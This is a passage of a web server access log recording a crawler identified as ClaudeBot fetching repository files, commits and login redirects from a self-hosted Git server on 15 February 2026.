216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 216.73.216.188] [Length 9849] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=source" [Client 216.73.216.188] [Length 33611] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 15309] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcUaMinimal%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 216.73.216.188] [Length 10121] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 216.73.216.188] [Length 12959] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 911] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14838] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 10933] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=source" [Client 216.73.216.188] [Length 35816] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=source" [Client 216.73.216.188] [Length 12745] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11880] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11261] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json?display=source" [Client 216.73.216.188] [Length 11554] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.bundle" [Client 216.73.216.188] [Length 37269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 216.73.216.188] [Length 9838] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 216.73.216.188] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=projects.sln" [Client 216.73.216.188] [Length 22177] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_access.log?display=source" [Client 216.73.216.188] [Length 22687] [Gzip 10.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11294] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11290] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 10994] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.vscode" [Client 216.73.216.188] [Length 22607] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 10940] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10060] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.bundle" [Client 216.73.216.188] [Length 242090] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=source" [Client 216.73.216.188] [Length 23710] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16456] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" [Client 216.73.216.188] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=source" [Client 216.73.216.188] [Length 38738] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.vscode%2Fsettings.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 216.73.216.188] [Length 22114] [Gzip 6.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=source" [Client 216.73.216.188] [Length 10948] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13912] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fgraph" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14183] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13863] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 216.73.216.188] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json?display=source" [Client 216.73.216.188] [Length 11117] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15768] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14905] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 12155] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 17886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html" [Client 216.73.216.188] [Length 99918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html" [Client 216.73.216.188] [Length 106998] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2Fprojects.sln" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 216.73.216.188] [Length 9869] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 9831] [Gzip 2.87] [Sent-to 